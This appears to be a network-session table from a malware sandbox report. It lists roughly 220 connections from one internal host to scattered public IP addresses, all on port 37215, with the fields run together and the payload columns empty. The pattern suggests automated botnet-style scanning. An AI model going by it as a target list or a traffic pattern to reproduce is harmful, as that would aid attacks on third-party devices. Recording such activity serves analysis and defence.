                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23196192.168.2.153983631.15.70.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23197192.168.2.1547604181.61.25.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23198192.168.2.154453073.38.73.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23199192.168.2.153924241.188.173.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23200192.168.2.1546268138.7.193.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23201192.168.2.1533844156.85.247.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23202192.168.2.154067637.56.10.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23203192.168.2.1549472190.250.153.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23204192.168.2.156049445.247.22.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23205192.168.2.1560900102.38.27.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23206192.168.2.153306231.219.85.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23207192.168.2.155816645.226.68.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23208192.168.2.154561841.34.176.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23209192.168.2.1560842121.4.66.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23210192.168.2.1557180190.124.193.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23211192.168.2.1541608156.59.124.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23212192.168.2.1557778222.248.136.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23213192.168.2.154358237.201.210.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23214192.168.2.1552382157.64.30.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23215192.168.2.1533612222.238.43.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23216192.168.2.155553231.52.229.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23217192.168.2.1552256157.93.239.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23218192.168.2.154316445.172.57.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23219192.168.2.1539668157.231.141.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23220192.168.2.1549064181.164.232.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23221192.168.2.1553688186.83.173.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23222192.168.2.1542458181.105.150.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23223192.168.2.155030674.121.49.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23224192.168.2.1554192138.12.148.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23225192.168.2.1559808181.74.1.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23226192.168.2.1540950122.28.190.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23227192.168.2.1557328157.177.243.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23228192.168.2.1554320181.49.177.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23229192.168.2.1550366222.96.69.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23230192.168.2.154132231.29.191.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23231192.168.2.154725831.75.161.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23232192.168.2.155959641.211.1.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23233192.168.2.155206841.45.95.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23234192.168.2.154492641.140.6.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23235192.168.2.1549576156.172.244.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23236192.168.2.1543474186.198.104.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23237192.168.2.1550520190.28.209.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23238192.168.2.154386431.75.37.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23239192.168.2.1535954122.254.106.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23240192.168.2.1553274209.183.90.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23241192.168.2.153853231.183.248.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23242192.168.2.1558188157.44.159.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23243192.168.2.1544566222.0.195.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23244192.168.2.1551416222.18.51.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23245192.168.2.1552748122.148.67.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23246192.168.2.1542602156.226.90.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23247192.168.2.1550586157.218.152.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23248192.168.2.1535914181.3.214.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23249192.168.2.1536080138.149.190.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23250192.168.2.155380894.96.110.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23251192.168.2.155164431.212.137.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23252192.168.2.153351045.133.105.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23253192.168.2.1550026181.35.189.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23254192.168.2.1538268197.40.92.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23255192.168.2.153681245.6.192.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23256192.168.2.155540845.100.143.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23257192.168.2.154454237.125.223.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23258192.168.2.1534126121.133.23.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23259192.168.2.1552664102.74.139.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23260192.168.2.154792445.242.189.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23261192.168.2.1542178156.15.125.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23262192.168.2.1556490156.56.89.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23263192.168.2.1542120197.13.25.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23264192.168.2.1533688190.213.22.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23265192.168.2.1541344197.65.238.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23266192.168.2.1560432181.11.11.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23267192.168.2.1547116102.194.24.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23268192.168.2.1556678157.32.115.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23269192.168.2.1548644157.66.62.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23270192.168.2.1545586186.15.184.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23271192.168.2.1555914121.193.31.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23272192.168.2.155017437.194.224.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23273192.168.2.1540704190.205.87.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23274192.168.2.155278845.184.145.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23275192.168.2.1535502138.45.73.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23276192.168.2.153587641.23.160.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23277192.168.2.1551540181.251.25.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23278192.168.2.1550774156.170.125.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23279192.168.2.1549288156.163.200.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23280192.168.2.1533752181.237.162.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23281192.168.2.1533890157.20.143.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23282192.168.2.154035694.203.47.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23283192.168.2.1540522138.97.241.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23284192.168.2.1557294122.245.243.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23285192.168.2.1536886122.139.84.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23286192.168.2.154490045.117.123.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23287192.168.2.1536736121.202.235.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23288192.168.2.1554364186.35.142.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23289192.168.2.1532956181.161.60.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23290192.168.2.1540542190.43.169.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23291192.168.2.1537098156.54.72.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23292192.168.2.1537016102.55.100.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23293192.168.2.153499094.180.14.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23294192.168.2.155890231.254.98.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23295192.168.2.1546832122.200.183.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23296192.168.2.1542644181.250.242.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23297192.168.2.153759445.184.142.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23298192.168.2.153878231.6.25.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23299192.168.2.1540138186.93.250.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23300192.168.2.1539512138.26.102.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23301192.168.2.1547914122.23.91.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23302192.168.2.1542024138.186.61.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23303192.168.2.1535718138.60.0.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23304192.168.2.154800441.77.126.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23305192.168.2.155659694.249.207.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23306192.168.2.154658441.174.187.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23307192.168.2.1533190181.97.27.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23308192.168.2.155839237.147.130.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23309192.168.2.1553188190.69.33.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23310192.168.2.1546236186.57.97.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23311192.168.2.155051294.48.198.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23312192.168.2.1544108197.73.77.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23313192.168.2.1544706121.35.145.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23314192.168.2.1549750121.0.211.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23315192.168.2.1549434121.214.37.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23316192.168.2.1543252186.55.85.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23317192.168.2.1553108197.177.157.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23318192.168.2.1542930197.242.63.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23319192.168.2.153655045.53.250.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23320192.168.2.154088841.92.192.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23321192.168.2.155488045.154.64.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23322192.168.2.1554900102.49.145.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23323192.168.2.1533002138.179.175.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23324192.168.2.155129845.23.235.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23325192.168.2.1547446186.94.57.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23326192.168.2.1556200102.238.238.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23327192.168.2.1547874190.77.22.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23328192.168.2.1541124102.171.248.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23329192.168.2.1558276192.203.184.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23330192.168.2.155077045.96.88.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23331192.168.2.154720441.61.7.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23332192.168.2.154222441.157.77.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23333192.168.2.154356045.44.28.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23334192.168.2.1537558197.208.36.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23335192.168.2.154031437.170.89.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23336192.168.2.1535336186.13.231.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23337192.168.2.1535230181.218.78.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23338192.168.2.1539598102.9.92.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23339192.168.2.154496031.102.111.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23340192.168.2.1550672190.23.85.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23341192.168.2.1547038156.241.91.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23342192.168.2.1543380197.146.96.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23343192.168.2.1540034102.123.156.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23344192.168.2.1541982190.189.60.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23345192.168.2.154536045.63.197.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23346192.168.2.1555012116.224.33.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23347192.168.2.1560672122.107.249.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23348192.168.2.1552806102.214.8.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23349192.168.2.1545266122.57.172.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23350192.168.2.1554414186.128.63.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23351192.168.2.153995831.69.63.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23352192.168.2.1560608197.94.145.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23353192.168.2.155568694.32.104.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23354192.168.2.1533010121.72.20.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23355192.168.2.1559740197.244.54.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23356192.168.2.1540376121.177.251.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23357192.168.2.155049637.129.2.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23358192.168.2.1554022186.180.188.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23359192.168.2.1533800181.118.208.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23360192.168.2.1536920126.91.42.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23361192.168.2.1542162186.32.83.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23362192.168.2.1545072180.58.227.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23363192.168.2.1551664138.126.0.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23364192.168.2.1551514138.82.228.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23365192.168.2.155215031.201.107.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23366192.168.2.1545688156.17.49.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23367192.168.2.153719831.21.128.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23368192.168.2.155177645.178.195.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23369192.168.2.1533452102.19.209.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23370192.168.2.1535260186.255.215.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23371192.168.2.154164631.36.73.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23372192.168.2.1542872222.57.126.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23373192.168.2.1540426102.150.36.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23374192.168.2.1555302121.66.23.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23375192.168.2.1542838102.58.123.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23376192.168.2.1549562102.162.177.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23377192.168.2.1540956186.185.132.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23378192.168.2.153781294.150.123.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23379192.168.2.1533046156.225.53.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23380192.168.2.1543552197.97.91.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23381192.168.2.1542578102.169.207.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23382192.168.2.1556550190.97.253.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23383192.168.2.1559954122.118.127.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23384192.168.2.1560574138.133.76.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23385192.168.2.1549410138.63.47.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23386192.168.2.1559820121.46.70.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23387192.168.2.154366237.221.42.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23388192.168.2.154511441.49.117.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23389192.168.2.155592241.100.133.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23390192.168.2.1537932202.71.59.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23391192.168.2.1559726156.77.226.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23392192.168.2.1541240186.46.242.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23393192.168.2.153314041.218.247.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23394192.168.2.154089852.48.32.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23395192.168.2.1539738102.61.61.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23396192.168.2.1541740102.197.146.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23397192.168.2.153578631.86.214.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23398192.168.2.1548662157.199.79.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23399192.168.2.155553041.129.155.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23400192.168.2.1542000138.191.151.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23401192.168.2.1555508186.106.157.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23402192.168.2.1558398190.76.93.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23403192.168.2.1543790156.84.63.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23404192.168.2.1541120181.231.210.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23405192.168.2.1554778122.81.17.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23406192.168.2.1557604121.195.183.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23407192.168.2.1559008199.203.169.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23408192.168.2.153578231.204.201.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23409192.168.2.154566894.118.41.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23410192.168.2.1551124197.74.52.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23411192.168.2.1535602222.164.186.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23412192.168.2.1555560181.180.191.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23413192.168.2.153768432.96.143.6037215
                                              TimestampBytes transferredDirectionData


